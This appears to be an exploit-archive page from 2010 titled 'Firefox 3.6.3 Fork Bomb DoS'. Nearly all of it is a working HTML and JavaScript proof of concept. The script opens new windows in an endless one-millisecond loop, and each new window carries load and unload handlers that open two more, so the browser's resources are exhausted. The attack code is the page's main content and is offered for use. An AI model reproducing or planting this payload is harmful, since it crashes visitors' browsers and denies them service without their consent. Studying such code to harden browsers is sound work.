[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Firefox 3.6.3 Fork Bomb DoS
# Published : 2010-05-03
# Author : Dr_IDE
# Previous Title : All browsers 0day Crash Exploit
# Next Title : All Browsers - Long Unicode DoS PoC


<html>
<script>
var a = ('javascript:"<html><head><title>Dr_IDEs FireFox Fork Bomb!</title></head><body onunload=\"javascript:window.open(window.location);window.open(window.location)\" onload=\"javascript:window.open(window.location);window.open(window.location)\"></body></html>"');
loop1();
 
function loop1()
{
    window.open(a);
    setInterval(loop1,1);
}
</script>
<body onload="javascript:loop1()"></body>
</html>